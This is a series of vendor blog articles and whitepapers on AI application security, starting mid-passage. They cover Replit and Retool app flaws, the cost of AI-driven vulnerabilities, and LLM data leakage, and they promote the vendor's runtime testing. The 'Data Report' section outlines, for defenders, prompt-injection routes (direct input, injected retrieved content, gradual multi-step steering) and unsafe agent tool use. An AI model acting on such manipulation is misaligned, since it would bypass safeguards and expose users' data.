Most application security tooling is designed to detect vulnerabilities inside code or at runtime. AI-assisted data exfiltration does not fit neatly into either category.

Static analysis does not see prompts. It cannot reason about context shared outside the repository. DAST tools focus on request-response behavior, not how code was produced. Even audits often stop at repository boundaries.

The result is a gap in which meaningful risk exists, but no tool is clearly responsible for detecting it.

This is why AI AppSec requires a shift in perspective. The problem is not just insecure code. It is an insecure behavior across the development lifecycle.

What Actually Helps Reduce AI-Driven Data Leakage

There is no single control that solves this problem. Effective mitigation starts with recognizing AI tools as data egress paths.

Teams need clear guidance on what should never be shared in prompts, even temporarily. Secrets, credentials, and sensitive identifiers should be handled the same way as in logs. Retrieval systems work best when they are deliberately constrained. If a model only needs access to a narrow slice of data to do its job, that should be the only slice it can see. Anything broader just increases the chance that information will surface where it doesn’t belong.

What matters just as much is what happens after the code is generated and shipped. At that point, assumptions stop helping. To really understand the risk, security teams have to look at what the code does once it’s live. Not in a test harness. Not in a clean demo. But when real users start clicking around, sending unexpected inputs, and pushing the system in ways no one planned for. 

Reading code and guessing intent isn’t enough anymore. What matters is watching how the application actually behaves after it’s deployed. Risk shows up in execution, not in comments or design docs. If you’re not validating that behavior over time, you’re mostly just hoping things stay safe.

 By testing applications dynamically and continuously, teams can catch issues introduced by generated code before they reach production users.

Where Runtime AppSec Fits Into AI Development

AI-assisted development moves fast. Security controls that slow developers down will be bypassed. Controls that operate automatically and provide evidence work better.

Testing applications while they’re running fills a gap that AI-heavy development has created. It focuses on the things that actually break in real systems – who can access what, how data moves through workflows, where boundaries can be crossed, and how features behave when they’re used in ways no one planned for. Those are exactly the places where AI-generated code tends to introduce problems, not because it’s careless, but because it doesn’t understand impact.

Done right, this kind of testing doesn’t slow teams down. It creates a feedback loop instead. Developers keep shipping at the pace they’re used to, while security teams get real signals instead of guesses. Issues surface based on behavior, not speculation, which makes conversations shorter and fixes more targeted.

That’s where Bright fits in naturally. Instead of judging code by how it looks or what it was supposed to do, it watches what actually happens once that code is live. The question stops being “does this seem safe?” and becomes “is this safe when people are really using it?” That shift makes all the difference.

Conclusion: AI Does Not Steal Data – It Reveals It

AI coding assistants do not leak data out of malice. They do it through logic. They amplify what developers share, infer structure from context, and reproduce patterns at scale. None of this looks like an attack, which is why it is so easy to ignore.

But ignoring it does not make the risk disappear. As AI becomes more deeply embedded in development workflows, the cost of unmanaged data exposure grows. Architecture becomes easier to map. Assumptions become easier to exploit. Sensitive details escape without triggering alarms.

The organizations that manage this well are not the ones banning AI tools. They are the ones treating AI-assisted development as part of their application attack surface. They invest in visibility, enforce boundaries around context, and validate behavior continuously.

AI is here to stay. The question is not whether teams should use it. The question is whether they are prepared to secure the way it actually works.

Vulnerabilities of Coding with Replit and Retool: When Speed Becomes the Attack Surface

Table of Content

  1. Introduction
  2. Why Replit and Retool Are Everywhere Right Now
  3. Low-Code Does Not Mean Low Risk
  4. Common Security Failures in Replit-Built Applications
  5. Where Retool Introduces a Different Kind of Risk
  6. Why Traditional AppSec Tools Miss These Issues
  7. Behavior Is the Real Security Boundary
  8. How Bright Finds What Replit and Retool Miss
  9. What Teams See After Adding Bright
  10. The Bigger Lesson for Modern Development
  11. Final Thoughts

Introduction

Replit and Retool have quietly changed how a lot of teams build software. What used to take weeks – setting up environments, wiring APIs, building internal dashboards-now happens in an afternoon. For developers under pressure to ship, that speed feels like a win. For product teams, it feels like leverage. For security teams, though, it often shows up later as a surprise.

Both platforms make it easier to build real applications quickly. Not demos. Not throwaway prototypes. Real systems that talk to databases, move data, authenticate users, and trigger business actions. And once an application does those things, the bar for security changes, whether the code was written by hand, generated, or assembled visually.

The problem isn’t that Replit or Retool are unsafe. The problem is how easily applications built on top of them drift from internal convenience to production-grade systems without anyone stopping to reassess the risk.

Why Replit and Retool Are Everywhere Right Now

Replit lowers the friction of development to almost zero. You get an environment instantly, dependencies handled for you, and a fast path from idea to running code. For teams experimenting with new features or spinning up microservices, that’s hard to ignore.

Retool, on the other hand, removes friction from internal tooling. Need a dashboard? An admin panel? A workflow to move money, update records, or approve requests? Drag, drop, and connect a database, and you’re done. No frontend framework debates. No API boilerplate.

The common thread is abstraction. Both tools hide complexity so developers can focus on outcomes. That’s the value. But abstraction also hides security assumptions—often the wrong ones.

Most teams start with good intentions:
“This is internal.”
Only engineers will use it.
We’ll lock it down later.
Then access expands. A contractor needs visibility. A customer-facing feature sneaks in. An internal tool becomes critical infrastructure.

That’s usually when the problems begin.

Low-Code Does Not Mean Low Risk

There’s a persistent myth that low-code or hosted dev platforms reduce security risk because less code means fewer bugs. In practice, the opposite often happens.

When code is generated or assembled visually, developers are less likely to think about edge cases. Authorization logic gets scattered across UI conditions instead of being enforced centrally. Defaults are trusted more than they should be. And because everything works on the happy path, nobody questions it.

Attackers don’t follow happy paths.

They click buttons out of order. They replay requests. They modify parameters. They try things the UI never intended to allow. And that’s where a lot of Replit- and Retool-based apps fall apart.

Common Security Failures in Replit-Built Applications

Authentication That Exists but Doesn’t Really Enforce

Many Replit apps include authentication because the framework or template made it easy. Login works. Sessions exist. Tokens are present.

What’s often missing is consistent enforcement.

Endpoints assume the frontend has already checked permissions. Functions trust the request context without validating role or ownership. One API might verify access correctly, while the next one assumes it’s only called internally.

From the outside, everything looks protected. Under the hood, it’s inconsistent. And inconsistency is exactly what attackers look for.

APIs That Grow Faster Than Their Controls

Replit encourages experimentation. Developers add routes quickly, expose helper endpoints, or create shortcuts to unblock themselves.

Those endpoints don’t always get revisited.

It’s common to find:

  1. APIs without authorization checks
  2. Debug endpoints left enabled
  3. Helper routes that bypass validation
  4. Internal-only functions exposed publicly

None of these issues is exotic. They’re the result of speed. And static analysis alone rarely catches them, because the code looks “reasonable” in isolation.

File Handling and Data Exposure

Replit apps frequently deal with uploads, configuration files, or generated content. Without strict controls, this leads to:

  1. Upload paths that allow unexpected file types
  2. Direct access to stored objects
  3. Missing ownership checks on downloads

These flaws don’t usually show up in code review. They show up when someone intentionally tries to access data that isn’t theirs.

Where Retool Introduces a Different Kind of Risk

Retool failures tend to look less like classic vulnerabilities and more like governance breakdowns

Internal Tools with External Impact

Retool apps often connect directly to production databases. That’s the point. But many of them run with credentials that are far more powerful than necessary.

When UI-level permissions don’t match backend enforcement, a user can manipulate requests, modify parameters, or trigger queries in ways the interface never intended.

What was meant to be an internal dashboard becomes a powerful control surface.

Business Logic Living in the UI

In many Retool apps, critical logic lives in button conditions, form visibility rules, or client-side checks.

If the user is an admin, show this.
If this field is hidden, the action can’t run.

Attackers don’t care about UI rules. They care about what the backend accepts.

When backend validation is missing, UI logic becomes security theater.

Query and Parameter Abuse

Retool makes it easy to template queries and bind inputs. It also makes it easy to trust those inputs too much.

Without careful validation, parameters can be manipulated to:

  1. Access unauthorized records
  2. Modify unexpected fields
  3. Trigger actions outside the intended scope

Again, nothing looks obviously broken. Until someone tries to abuse it.

Why Traditional AppSec Tools Miss These Issues

Most AppSec tooling was designed for handwritten codebases. It looks for patterns. It scans files. It flags known weaknesses.

That approach struggles with Replit and Retool apps for a simple reason: the risk isn’t in the syntax. It’s in the behavior.

Authorization gaps. Workflow abuse. Broken object access. These issues depend on how the application behaves at runtime, not how it looks in a repository.

Static scanners don’t understand UI-driven logic. Code review can’t simulate misuse. And many tools stop once the app “looks secure.”

Attackers don’t.

Behavior Is the Real Security Boundary

This is the core shift teams need to make.

It doesn’t matter whether an app was built with React, Replit, Retool, or generated by an LLM. Once it runs, it exposes behavior. That behavior is what attackers test.

Security has to follow behavior, not abstractions.

How Bright Finds What Replit and Retool Miss

Bright approaches these applications the same way an attacker would: as running systems.

It doesn’t care how the app was built. It maps endpoints, authenticates, moves through workflows, and tests what’s actually reachable.

That matters for Replit and Retool apps because:

  1. It discovers endpoints that the UI never exposes
  2. It validates authorization across real flows
  3. It tests multi-step abuse scenarios
  4. It proves whether an issue is exploitable

Instead of guessing based on patterns, Bright confirms risk through execution.

AI SAST Where It Helps, Runtime Validation Where It Matters

AI SAST plays a useful role early. It can highlight risky patterns in generated code, inconsistent checks, or unsafe assumptions.

But AI-generated and low-code apps don’t fail only at the code level. They fail at the interaction level.

That’s why Bright pairs analysis with dynamic testing. Fixes are validated. Assumptions are tested. False positives drop dramatically.

What Teams See After Adding Bright

The biggest change isn’t more findings. It’s fewer arguments.

Developers stop asking, Is this real?
Security stops guessing about impact.
Product teams stop being surprised in production.

Findings come with proof. Fixes are re-tested. Regressions get caught early.

For fast-moving teams using Replit and Retool, that confidence is often the difference between shipping safely and shipping blind.

The Bigger Lesson for Modern Development

Speed isn’t the problem. Blind trust is.

Replit and Retool are powerful tools. They remove friction and unlock productivity. But they also shift responsibility. When abstraction hides complexity, security has to work harder to validate reality.

Modern AppSec isn’t about blocking tools. It’s about validating outcomes.

Final Thoughts

Replit and Retool are not insecure platforms. But applications built on them inherit the same risks as any production system, often faster than teams realize.

When internal tools become critical workflows, and generated code becomes real logic, security must move with it.

Bright doesn’t slow teams down. It gives them clarity. And in an environment where speed is non-negotiable, clarity is the only sustainable form of security.

The Cost of Vulnerabilities in the Age of Generative AI

Table of Conatnt

Introduction

Generative AI Has Changed the Risk Equation

Why AI-Driven Vulnerabilities Are More Expensive

AI Vulnerabilities Do Not Behave Like Traditional Bugs

Why Traditional AppSec Models Fall Short

The Hidden Cost of Noise and What Slips Through

Why Runtime Validation Changes the Cost Model

Continuous Testing Is No Longer Optional

Compliance and Governance Costs in AI Systems

Measuring What Actually Matters

How Bright Helps Reduce Long-Term Security Costs

Strategic Takeaways for Security Leaders

Conclusion

Introduction

Generative AI has changed how software is actually built on the ground. A lot of logic that used to be written, reviewed, and argued over is now produced automatically and stitched into applications with very little friction. That makes teams faster, but it also means security decisions are being made quietly, sometimes without anyone realizing a decision was made at all.

When issues show up in these systems, they rarely look like classic security bugs. Nothing obvious is misconfigured. The servers are fine. The code works. The problem usually comes from how the model behaves once it’s live – how it interprets instructions, how it reacts to unexpected input, or how its output is trusted by other parts of the system. These failures don’t trigger alarms early. They surface later, in real usage, when the cost of fixing them is much higher. These failures often bypass traditional AppSec controls and remain undetected until they cause real impact.

This whitepaper examines how generative AI reshapes the economics of application security, why traditional testing models fall short, and how a validation-driven approach, central to Bright’s philosophy, helps organizations reduce risk before vulnerabilities become expensive production incidents.

Generative AI Has Changed the Risk Equation

For decades, application security evolved alongside relatively predictable development processes. Engineers wrote code, security teams reviewed it, and vulnerabilities were traced back to specific implementation errors. Generative AI disrupts this model.

Today, AI systems actively participate in application behavior. Models generate logic, influence workflows, and sometimes make decisions that affect access, data handling, or downstream services. In many organizations, this happens without a clear shift in security ownership or testing strategy.

The result is not simply “more vulnerabilities,” but different vulnerabilities – ones that emerge from interaction, context, and behavior rather than static code alone. These weaknesses do not announce themselves through crashes or failed builds. They surface quietly, often under normal usage patterns, which makes them harder to detect and more expensive to fix.

Why AI-Driven Vulnerabilities Are More Expensive

Traditional vulnerabilities tend to follow a familiar cost curve. If detected early, they are cheap to fix. If they reach production, costs increase but remain bounded by established incident response playbooks.

AI-related vulnerabilities break this curve.

First, detection costs rise. Security teams often struggle to determine whether a reported issue is real. Static tools flag patterns, but they cannot prove exploitability. Manual reviews stall because behavior depends on runtime context, not just code.

Second, remediation costs increase. Fixing AI-driven issues often requires redesigning workflows, adjusting context handling, or tightening access controls across multiple systems. These changes are rarely localized.

Third, response costs escalate. When something goes wrong in production, explaining why it happened becomes difficult. Logs may show normal requests. Outputs may look legitimate. The vulnerability exists in how the system behaves, not in an obvious breach event.

Finally, trust costs accumulate. Repeated false alarms erode developer confidence. Undetected issues erode leadership confidence. Both slow down security decision-making when it matters most.

AI Vulnerabilities Do Not Behave Like Traditional Bugs

A key reason costs rise is that AI vulnerabilities do not map cleanly to traditional categories.

Many issues only appear when:

  • Context is combined across sources
  • Prompts evolve over time
  • Generated logic interacts with live data
  • Multiple automated steps are chained together

From a security perspective, this creates blind spots. Static analysis cannot predict how a model will behave. Signature-based scanning cannot detect semantic manipulation. Even manual review struggles when behavior depends on inference rather than explicit logic.

These vulnerabilities are not theoretical. They are observed in production systems where models inadvertently expose data, bypass controls, or perform actions outside their intended scope.

Why Traditional AppSec Models Fall Short

Most AppSec programs still rely on assumptions that no longer hold:

  • That code behavior is deterministic
  • That risk can be scored once and remain stable
  • That fixes can be validated statically

Generative AI invalidates these assumptions.

Risk in AI systems is dynamic. Prompts change. Data sources evolve. Model updates alter behavior. A vulnerability that appears low-risk today may become critical tomorrow without any code change.

Static testing captures a snapshot. AI risk unfolds over time.

This mismatch is why organizations experience growing security backlogs, prolonged triage cycles, and repeated debates over whether issues are “real.”

The Hidden Cost of Noise and What Slips Through

False positives don’t just waste time – they quietly wear teams down. 

When engineers keep digging into findings that never turn into real issues, confidence in security tools drops fast. People stop jumping on alerts right away. Fixes get pushed to “later.” Some issues get closed simply because no one is sure what’s real anymore. That’s how actual risk gets buried in the noise.

The other side is worse. The issues that don’t get flagged are usually the ones that matter most. In AI-driven systems, those failures tend to show up where it hurts – sensitive data exposure, automated decisions going wrong, or behavior customers notice immediately. By the time these problems surface in production, the damage is already done. Rolling things back, explaining what happened, and rebuilding trust costs far more than fixing the issue earlier – if someone had clear proof it was real.

Why Runtime Validation Changes the Cost Model

The most effective way to reduce AI-related security costs is to validate behavior, not assumptions.

Runtime validation answers the question that matters most: Can this actually be exploited in a live system? Instead of relying on theoretical risk, it provides evidence.

This approach delivers three cost benefits:

  1. Faster triage – Teams stop debating and start fixing
  2. Targeted remediation – Effort is spent only on real issues
  3. Lower regression risk – Fixes are verified under real conditions

Bright’s philosophy is built around this principle. By testing applications from an attacker’s perspective and validating exploitability dynamically, Bright reduces both noise and uncertainty across the SDLC.

Continuous Testing Is No Longer Optional

One-time security testing assumes systems are static. AI systems are not.

Models change. Prompts evolve. Permissions drift. Integrations expand. Each change can subtly alter behavior. Without continuous testing, organizations are effectively blind to how risk evolves after launch.

Continuous, behavior-based testing shifts security from a checkpoint to a feedback loop. It allows teams to:

  • Detect new exploit paths as they emerge
  • Validate that fixes remain effective
  • Catch regressions before they reach users

From a cost perspective, this prevents small issues from becoming expensive incidents.

Compliance and Governance Costs in AI Systems

Regulators are increasingly focused on how AI systems access data, make decisions, and enforce controls. For many organizations, the biggest compliance risk is not malicious intent, but a lack of visibility.

AI systems may expose data without triggering traditional breach alerts. Outputs may reveal sensitive context without explicit exfiltration. Audit trails may show “normal usage” rather than abuse.

Organizations that cannot demonstrate runtime controls, validation, and monitoring face higher audit friction and legal exposure. The cost here is not just fines – it is delayed approvals, increased scrutiny, and reputational damage.

Measuring What Actually Matters

In AI-driven environments, counting vulnerabilities is less useful than measuring confidence.

More meaningful indicators include:

  • Percentage of findings validated at runtime
  • Mean time to confirm exploitability
  • Reduction in disputed security issues
  • Fixes verified under real conditions

These metrics align security efforts with actual risk reduction rather than alert volume.

How Bright Helps Reduce Long-Term Security Costs

Bright is designed for modern application environments where behavior matters more than static structure.

By continuously testing live applications and validating vulnerabilities dynamically, Bright helps organizations:

  • Eliminate false positives early
  • Focus remediation on exploitable issues
  • Validate fixes automatically in CI/CD
  • Maintain visibility as systems evolve

This approach does not slow development. It removes uncertainty, which is one of the highest hidden costs in security programs today.

Strategic Takeaways for Security Leaders

Generative AI has shifted application security from a code-centric discipline to a behavior-centric one. Organizations that continue to rely solely on static assumptions will see rising costs, longer response times, and more production incidents.

Reducing cost in the AI era requires:

  • Treating AI behavior as part of the attack surface
  • Validating exploitability, not just detecting patterns
  • Testing continuously as systems evolve
  • Aligning security metrics with real impact

The goal is not perfect prevention. It is a predictable risk reduction.

Conclusion

The true cost of vulnerabilities in the age of generative AI is not measured only in breaches or bug counts. It is measured in uncertainty, wasted effort, delayed response, and lost trust.

AI-driven systems don’t usually fail in obvious ways. They don’t crash loudly or throw clear errors. Instead, they drift, behave inconsistently, or start doing things that technically “work” but shouldn’t be trusted. That’s why security approaches built for static software fall short here.

In an environment where applications think, infer, and act, security must observe, validate, and adapt. Bright exists to make that possible – before the cost of getting it wrong becomes unavoidable.

Data Report: The Most Common Vulnerabilities in AI-Integrated Applications

Table of Contant

Introduction

How This Report Was Compiled

What AI-Integrated Applications Actually Look Like

Vulnerability Category 1: Prompt Injection and Instruction Manipulation

Vulnerability Category 2: Silent Data Leakage

Vulnerability Category 3: Broken Authorization Through AI Mediation

Vulnerability Category 4: Unsafe Tool Invocation

Vulnerability Category 5: Multi-Step Logic and Workflow Abuse

Where These Vulnerabilities Commonly Appear

Why Traditional AppSec Struggles Here

The Visibility Problem

What This Data Says About AI Security Maturity

Practical Implications for Security Teams

Conclusion

Introduction

AI-integrated applications are now part of everyday production environments. What began as experimentation with chatbots and internal assistants has evolved into systems where large language models influence authentication flows, automate business decisions, interact with internal tools, and retrieve sensitive data on demand. In many organizations, these systems are already mission-critical.

At the same time, security practices around AI have not matured at the same pace. Most application security programs are still structured around deterministic systems: code paths that behave the same way every time, inputs that can be validated syntactically, and vulnerabilities that map cleanly to known classes. AI systems break those assumptions.

This report documents the most common vulnerability patterns observed in real AI-integrated applications. These issues are not rare edge cases. They appear repeatedly across industries, architectures, and deployment models. Many of them are not detected by traditional AppSec tools, not because those tools are ineffective, but because the threat model itself has changed.

The core finding is simple: AI introduces a behavioral attack surface. Vulnerabilities increasingly emerge from how models interpret context, how they are allowed to act, and how their outputs are trusted downstream. Organizations that continue to treat AI as “just another dependency” are missing where risk actually lives.

How This Report Was Compiled

The insights in this report are based on hands-on analysis of AI-enabled applications tested under conditions that resemble real usage. The environments examined include:

  • Web applications with embedded LLM features
  • APIs where model output influences business logic
  • Retrieval-augmented generation (RAG) systems connected to internal knowledge bases
  • Internal tools and copilots used by engineering, support, and operations teams
  • Agent-based systems capable of invoking tools or services

The focus was not on theoretical weaknesses or academic attacks. Instead, the emphasis was on what breaks when applications are exposed to unexpected inputs, ambiguous instructions, and adversarial interaction patterns over time.

Rather than looking for a single exploit, testing focused on observing how systems behave. This approach mirrors how real attackers probe AI systems: slowly, contextually, and with intent.

What AI-Integrated Applications Actually Look Like

In production, AI rarely exists in isolation. Most AI systems are deeply embedded in existing application stacks.

A typical setup might involve:

  • A frontend interface collecting user input
  • A backend assembling prompts from multiple sources
  • A model generating a response or decision
  • That output feeding into another service, workflow, or API

In many cases, the model is not just answering questions. It is:

  • Deciding which data to retrieve
  • Determining how a workflow proceeds
  • Selecting which tool to invoke
  • Generating content that is later parsed or acted upon

Once an application relies on model output to guide behavior, the model effectively becomes part of the system’s control logic. This is where many security assumptions quietly break.

Vulnerability Category 1: Prompt Injection and Instruction Manipulation

Prompt injection is the most frequently encountered vulnerability in AI-integrated applications. It is also one of the most misunderstood.

Unlike SQL injection or command injection, prompt injection does not exploit a parser or runtime. It exploits interpretation. Attackers manipulate how the model understands instructions, often without violating any syntactic rules.

This can happen through:

  • Direct user input
  • Indirect content retrieved from documents or APIs
  • Chained interactions that gradually reshape model behavior

The impact varies. In some cases, the result is misleading output. In others, the model bypasses safeguards, exposes internal context, or takes actions it should never have been allowed to take.

What makes prompt injection particularly dangerous is that it often looks like normal usage. There is no malformed payload, no obvious error, and no crash. From the application’s perspective, everything is functioning as designed.

Vulnerability Category 2: Silent Data Leakage

Data leakage in AI systems rarely resembles a traditional breach. There is usually no alert, no spike in traffic, and no obvious sign that something went wrong.

Instead, leakage occurs as a side effect of how context is assembled and how outputs are generated.

Common sources include:

  • Sensitive information pasted into prompts during debugging
  • Overly broad retrieval queries in RAG pipelines
  • Models generating verbose explanations that include internal data
  • Logging systems are capturing prompts and outputs without proper controls

In many environments, prompts and responses are logged by default for observability. Over time, this creates repositories of sensitive data that were never intended to be stored long-term.

The most concerning aspect is that these leaks often feel “logical” in hindsight. The system did exactly what it was told to do. The problem is that nobody fully understood what that would mean at scale.

Vulnerability Category 3: Broken Authorization Through AI Mediation

Authorization failures take on new forms when AI is involved. Traditional access control checks may still exist at the API level, but once a model is introduced into the decision loop, those guarantees weaken.

Examples observed in practice include:

  • Models summarizing or rephrasing data from restricted sources
  • AI assistants answering questions they should not be able to answer
  • Agents invoking internal tools without user-level authorization

In these cases, the application may never technically “violate” an access control rule. The violation occurs because the model is allowed to reason across data it should never have been exposed to in the first place.

This is especially common in internal tools, where trust assumptions are looser, and oversight is minimal.

Vulnerability Category 4: Unsafe Tool Invocation

Modern AI systems increasingly allow models to call tools, execute actions, or interact with APIs. This is where the line between “assistant” and “actor” starts to blur.

The most common problems here are not bugs in the tools themselves, but failures in how access is granted and enforced.

Observed issues include:

  • Tools exposed with broader permissions than necessary
  • Lack of constraints on how tools can be chained
  • Insufficient validation of tool inputs generated by the model
  • Minimal monitoring of tool usage patterns

Once a model can act on the system, the risk profile changes significantly. A single manipulated response can trigger actions that would normally require explicit user intent.

Vulnerability Category 5: Multi-Step Logic and Workflow Abuse

Some of the most impactful AI vulnerabilities do not appear in a single interaction. They emerge across a sequence of seemingly harmless steps.

Attackers may:

  • Gradually steer conversations toward sensitive areas
  • Accumulate partial context across sessions
  • Exploit persistent state in agents or assistants

Each interaction looks benign. The risk only becomes visible when viewed as a whole. This makes detection extremely difficult using traditional, request-based security models.

Where These Vulnerabilities Commonly Appear

Patterns emerge when looking across environments. The highest concentration of issues tends to appear in:

  • Internal AI copilots
  • Support and operations tools
  • Knowledge assistants connected to internal documentation
  • AI-powered APIs used by multiple teams

These systems are often trusted by default and tested less aggressively than public-facing applications. That trust becomes an attack surface.

Why Traditional AppSec Struggles Here

Most AppSec tooling was built for a different era. It expects vulnerabilities to map to known classes, payloads, and signatures.

AI vulnerabilities break those assumptions:

  • Static analysis cannot predict semantic interpretation
  • Signature-based scanning has no meaningful payloads to match
  • Point-in-time testing misses evolving prompts and data sources
  • Behavioral abuse does not resemble the exploitation of a bug

As a result, many issues remain invisible until they are abused in production.

The Visibility Problem

One of the defining traits of AI vulnerabilities is their low visibility. Many issues:

  • Do not trigger errors
  • Do not degrade performance
  • Do not look malicious

From logs alone, everything appears normal. This makes prioritization difficult and often leads to risk being underestimated until real damage occurs.

What This Data Says About AI Security Maturity

Across organizations, similar patterns repeat:

  • AI features are deployed faster than security controls
  • Models are trusted more than their behavior justifies
  • Runtime monitoring is minimal or nonexistent
  • Security reviews focus on infrastructure, not decision logic

This is not negligence. There is a lag between innovation and governance.

Practical Implications for Security Teams

Security teams that are adapting successfully tend to:

  • Treat AI components as first-class attack surfaces
  • Monitor inputs, context, and outputs at runtime
  • Apply least privilege to data sources and tools
  • Test AI behavior continuously, not just at launch

The goal is not to eliminate AI risk, but to make it observable and manageable.

Conclusion

AI-integrated applications don’t break in the same ways traditional software does. The issues discussed in this report aren’t caused by careless development or obvious configuration mistakes. They show up when models are allowed to interpret context, make decisions, and influence system behavior in ways that were never fully anticipated. It’s the combination of probabilistic outputs, shifting inputs, and implicit trust in model responses that creates risk – often quietly, and often without any clear sign that something has gone wrong.

Understanding these patterns is the first step. Addressing them requires security controls that operate where AI systems actually make decisions: at runtime, across context, and over time.

Ignoring this shift does not reduce risk. It simply delays when that risk becomes visible.

LLM Data Leakage: How Sensitive Data Escapes Without Anyone Noticing

Table of Contant

Introduction: The Quietest AI Risk

Understanding the Real Data Surface of LLM Systems

Common Ways Data Leaks Without Anyone Realizing

Why Traditional Security Monitoring Misses This Entirely

Controls That Actually Reduce LLM Data Leakage

Compliance and Regulatory Consequences

Why This Risk Will Increase, Not Decrease

Conclusion

Introduction: The Quietest AI Risk

Most conversations about AI security focus on attacks. Prompt injection. Jailbreaks. Model misuse. These risks are real, but they tend to be loud. Someone notices when a model starts behaving strangely or when guardrails are clearly bypassed.

Data leakage is different.

In most real-world incidents involving large language models, nothing “breaks.” There is no alert, no failed authentication, no obvious policy violation. The system behaves exactly as designed. Users interact normally. Logs fill up. Outputs look reasonable. And yet, sensitive information quietly leaves the boundaries it was supposed to stay within.

This is why LLM data leakage is one of the most underestimated risks in enterprise AI adoption. It does not resemble a traditional breach. There is no attacker forcing entry. Instead, leakage happens as a side effect of helpfulness, convenience, and speed – the very properties that make LLMs attractive in the first place.

Teams often discover the problem only after data has already spread across systems, logs, tickets, and internal tools. At that point, containment becomes difficult, and attribution becomes nearly impossible.

Understanding the Real Data Surface of LLM Systems

One of the reasons LLM data leakage is so hard to control is that the data surface of an AI system is far larger than most teams initially assume.

The most obvious source is user input. In enterprise environments, users are not malicious. They are engineers debugging production issues, analysts asking questions about internal reports, or support teams handling customer conversations. They trust the system and assume it is safe to share context.

That trust leads to behavior that would never occur in a traditional application. API keys are pasted into prompts. Internal URLs are shared. Customer identifiers, error logs, configuration files, and proprietary logic all find their way into conversations. Once entered, this information becomes part of the model’s working context.

System prompts and developer instructions add another layer. These prompts often encode business rules, internal assumptions, or operational logic. Over time, they grow complex and are rarely revisited with the same rigor as production code. While they are usually hidden from end users, they still influence how data is processed and reused.

Retrieval-augmented generation expands the surface further. RAG systems connect models to internal knowledge bases, document repositories, ticketing systems, and sometimes live databases. Retrieval is typically optimized for relevance, not sensitivity. If filtering is imperfect – and it often is – the model may pull in documents that were never meant to be exposed in the current context.

Logs and telemetry quietly multiply the problem. Prompts, responses, embeddings, and metadata are stored for debugging, monitoring, and analytics. These logs often outlive the original interaction and may be accessible to teams that would not otherwise be authorized to view the underlying data.

Finally, model outputs themselves become data sources. Responses are copied into Slack threads, pasted into Jira tickets, forwarded via email, or stored in internal documentation. Once that happens, the original access controls are gone, but the information remains.

Common Ways Data Leaks Without Anyone Realizing

Sensitive Data in Prompts

The simplest leakage scenario is also the most common. Engineers paste sensitive information into prompts because it feels faster than sanitizing data or recreating issues manually.

This behavior is understandable. LLM interfaces feel informal and conversational. They do not carry the same psychological weight as production databases or credential vaults. But from a security standpoint, a prompt is still an input channel that can be logged, stored, and reused.

Even if the model never repeats the data, the organization has already lost control over where that information resides and who can access it later.

Overly Helpful Responses

Language models are designed to explain. When asked a question, they often provide context, reasoning, and background to justify their answers. In enterprise systems, this can lead to responses that reveal internal workflows, decision logic, or operational details that were never intended to be shared.

The output may look harmless. It may even be technically correct. The issue is not accuracy, but scope. Without explicit constraints, models have no innate understanding of what should remain internal.

Retrieval Errors in RAG Systems

RAG systems introduce one of the most subtle leakage vectors. A document retrieved for a legitimate reason may contain sections that are inappropriate for the current user or use case. Models do not inherently understand data classification unless it is enforced externally.

As a result, sensitive internal documents can be summarized, paraphrased, or partially exposed. Because the output is transformed, it may not trigger traditional data loss detection mechanisms.

Logging and Observability Blind Spots

AI observability is often implemented quickly and with good intentions. Teams want visibility into how models behave. But logs frequently become shadow data stores containing exactly the information organizations work hardest to protect elsewhere.

Prompts and responses captured for debugging may include credentials, customer data, or internal reasoning. Over time, these logs accumulate and are accessed by people and systems that were never part of the original trust model.

Why Traditional Security Monitoring Misses This Entirely

From the perspective of traditional security tooling, nothing is wrong.

There is no unauthorized access. No suspicious traffic. No privilege escalation. Users are authenticated, APIs respond normally, and logs are written as expected.

Most leakage also happens incrementally. A small disclosure here. A contextual hint there. Individually, each response seems acceptable. Collectively, they can reveal far more than intended.

Because the behavior aligns with normal usage, alerts are never triggered. And because the output is often transformed rather than copied verbatim, it does not match known sensitive data patterns.

This is why many organizations only become aware of leakage during audits, compliance reviews, or post-incident investigations – long after the data has spread.

Controls That Actually Reduce LLM Data Leakage

Preventing LLM data leakage requires controls that operate at the same layer where the risk exists.

Context-aware inspection helps ensure that only appropriate data enters the model context. This includes validating retrieval sources, enforcing data classification, and dynamically limiting scope based on user role and use case.

Output controls add a final checkpoint before information leaves the system. While imperfect, they reduce the chance that sensitive details are exposed downstream.

Least-privilege principles must apply to models as well as users. Just because a model can access data does not mean it should. Tool access and retrieval permissions should be tightly scoped and reviewed regularly.

Runtime monitoring provides visibility that static reviews cannot. Observing how models behave under real conditions makes it possible to detect misuse patterns before they escalate.

Most importantly, organizations need to treat LLM systems as active participants in data flows, not passive tools.

Compliance and Regulatory Consequences

From a regulatory standpoint, LLM data leakage raises uncomfortable questions.

Data protection laws require organizations to demonstrate control over how data is accessed, processed, and disclosed. When models dynamically assemble context and generate transformed outputs, those controls become more difficult to verify.

Auditors are increasingly asking how AI systems access data, how access is enforced, and how misuse is detected. High-level assurances are no longer sufficient. Evidence of runtime controls, monitoring, and governance is becoming the expectation.

Even in the absence of a classic breach, uncontrolled data exposure can still constitute a compliance failure.

Why This Risk Will Increase, Not Decrease

As LLM adoption accelerates, the risk of data leakage grows by default.

More integrations. More retrieval sources. More internal users. More automation. Each addition expands the surface where sensitive data can escape.

At the same time, development speed often outpaces security review. Models are deployed quickly, prompts evolve organically, and retrieval sources are added incrementally. Without deliberate controls, leakage becomes a matter of when, not if.

Conclusion

Data leakage in LLM systems rarely looks like a security incident while it is happening. There is no exploit to trace and no clear moment where something “goes wrong.” Instead, information slips out through everyday use – a helpful answer that shares too much context, a document retrieved without enough filtering, or logs that quietly store sensitive inputs long after they were needed.

What makes this risk difficult is not just the technology, but the assumptions around it. Teams often treat models as passive tools, when in reality they actively combine, transform, and redistribute information across systems. Once that behavior is in production, traditional controls that focus on access or infrastructure no longer tell the full story.

Reducing this risk requires treating LLMs as part of the data lifecycle, not just part of the interface. That means being deliberate about what context is exposed, limiting what models are allowed to retrieve, and paying attention to what leaves the system as much as what goes in. Organizations that do this early will avoid painful clean-up work later – and will be in a much stronger position as AI oversight, audits, and expectations continue to increase.